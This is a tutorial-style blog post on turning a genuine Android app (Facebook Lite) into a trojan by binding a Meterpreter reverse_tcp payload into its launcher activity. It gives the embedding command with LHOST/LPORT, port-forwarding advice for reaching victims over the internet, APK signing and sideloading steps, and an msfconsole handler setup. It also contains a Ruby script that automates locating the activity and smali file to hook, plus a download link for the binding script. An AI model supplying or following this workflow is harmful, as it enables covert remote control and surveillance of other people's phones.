Today we will look at how to create a payload for Android devices.
We will bind an authentic APK file with a Meterpreter payload, so the target sees a familiar app while we get a shell.
Let's begin.
1. Download an authentic APK. Facebook Lite in our example.
2. Now we will use an automated script written in Ruby (apk-embed-payload.rb, linked at the end). It needs apktool and msfvenom on your PATH.
What does this script do?
- Creates an Android payload APK, the same one msfvenom would give you
- Decompiles the payload APK
- Decompiles the original app APK, in this case Facebook Lite
- Binds/hooks the payload activity to the main launcher activity of the original app, so the payload starts whenever the app is opened
NOTE: Once you run the command, if you are lucky, the script will do everything by itself and complete the whole process. But more often than not it cannot determine which Activity of the app it should bind the payload to, so it asks you to select one. In that case, leave the terminal with the script at the prompt and browse to /root/original.
Then open the AndroidManifest.xml file in any text editor of your liking and look for an 'activity' tag whose intent-filter contains both the texts '.MAIN' and '.LAUNCHER'. When you find that tag, look for the 'android:name' attribute of the activity and note the name. (A name starting with a dot is relative to the 'package' attribute of the manifest tag, so '.MainActivity' in package 'com.example' means 'com.example.MainActivity'.)
At the prompt of the Ruby script, enter the number corresponding to the Activity name you noted and press Enter.
For example, refer to
http://vinayakwadhwa.in/hook1.jpg
http://vinayakwadhwa.in/hook2.jpg
It then rebuilds the new APK with apktool and updates its AndroidManifest.xml (the payload needs permissions the original app may not have requested).
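The manual step from the NOTE above (finding the launcher activity the payload should be hooked into) can be done programmatically. The following Ruby script is an added example for this post; it is not part of the original post or of apk-embed-payload.rb. It parses a decompiled AndroidManifest.xml, returns every activity whose intent-filter carries both android.intent.action.MAIN and android.intent.category.LAUNCHER, resolves dot-relative names against the manifest's package attribute, and maps the class to the smali file apktool writes for it. The manifest embedded below is constructed for the example and is not Facebook Lite's real manifest; the directory layout (smali/<package path>/<Class>.smali) is the one apktool produces.

```ruby
require 'rexml/document'

MAIN_ACTION       = 'android.intent.action.MAIN'
LAUNCHER_CATEGORY = 'android.intent.category.LAUNCHER'

# Constructed sample of a decompiled AndroidManifest.xml (not a real app's
# manifest). One activity only handles VIEW; the other is the launcher.
SAMPLE_MANIFEST = <<~XML
  <?xml version="1.0" encoding="utf-8"?>
  <manifest xmlns:android="http://schemas.android.com/apk/res/android"
      package="com.example.app">
    <uses-permission android:name="android.permission.INTERNET"/>
    <application android:label="Example">
      <activity android:name=".SettingsActivity">
        <intent-filter>
          <action android:name="android.intent.action.VIEW"/>
        </intent-filter>
      </activity>
      <activity android:name=".MainActivity">
        <intent-filter>
          <action android:name="android.intent.action.MAIN"/>
          <category android:name="android.intent.category.LAUNCHER"/>
        </intent-filter>
      </activity>
    </application>
  </manifest>
XML

# Android resolves a leading-dot name (".Main") and a bare name ("Main")
# against the manifest's package; a dotted name is already fully qualified.
def qualify(package, name)
  return package + name if name.start_with?('.')
  return "#{package}.#{name}" unless name.include?('.')
  name
end

# All android:name values of the given child tag inside an intent-filter.
def filter_names(filter, tag)
  filter.elements.to_a(tag).map { |e| e.attributes['android:name'] }
end

# Fully qualified class names of every activity that the launcher shows,
# i.e. one of its intent-filters has both the MAIN action and the
# LAUNCHER category. Usually exactly one, but some apps declare several
# (aliases, multiple entry points), so we return them all.
def launcher_activities(manifest_xml)
  doc = REXML::Document.new(manifest_xml)
  package = doc.root.attributes['package']
  doc.elements.to_a('manifest/application/activity').select do |activity|
    activity.elements.to_a('intent-filter').any? do |filter|
      filter_names(filter, 'action').include?(MAIN_ACTION) &&
        filter_names(filter, 'category').include?(LAUNCHER_CATEGORY)
    end
  end.map { |activity| qualify(package, activity.attributes['android:name']) }
end

# Path of the smali file apktool writes for a class, relative to the
# decompiled directory; this is the file the hook is inserted into.
def smali_path(class_name)
  "smali/#{class_name.tr('.', '/')}.smali"
end

if __FILE__ == $PROGRAM_NAME
  # Pass a real decompiled manifest as ARGV[0], else use the embedded sample.
  xml = ARGV[0] ? File.read(ARGV[0]) : SAMPLE_MANIFEST
  launcher_activities(xml).each do |name|
    puts "#{name}  ->  #{smali_path(name)}"
  end
end
```

Run it against /root/original/AndroidManifest.xml to get the exact name to pick at the script's prompt, plus the smali file where the hook ends up, which is worth reading afterwards to confirm the injected invoke is in the activity's onCreate.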
The command is:
ruby apk-embed-payload.rb #originalapk# -p #payload# LHOST=#yourIP# LPORT=#anyport#
(for example, -p android/meterpreter/reverse_tcp; the LHOST/LPORT options are passed through to msfvenom, so LHOST is the address the phone will connect back to.)
NOTE: if you want to test over the internet and not just the WLAN, forward a port on your router's public IP to your local machine's 192.168.x.x:yyyy, and use the public IP and that port as LHOST/LPORT when building the payload.
3. We will then sign the APK using the d2j-apk-sign command (an unsigned APK will not install).
Let's do it!
# d2j-apk-sign #apk-name#
4. Install the signed APK on the phone. Sideloading requires allowing installs from unknown sources, and the genuine app must not already be installed: it was signed with a different key, so Android will refuse to install ours over it.
5. Let's create a listener!
# msfconsole
msf > use exploit/multi/handler
msf > set payload android/meterpreter/reverse_tcp
msf > set LHOST #your IP#
msf > set LPORT #the port you used while making the payload#
msf > exploit
(LHOST here is the address the handler binds to; if you forwarded a router port, it is your local 192.168.x.x address, not the public one.)
6. Run the app on the phone; the Meterpreter session opens as soon as the launcher activity starts.
7. You are the boss!
There are some advanced adb shell commands to play around with as well; do your research!
Hint: start service call
Link to the apk-embed-payload.rb file
http://vinayakwadhwa.in/apk-embed-payload.rb
#android #hacking #meterpreter #anon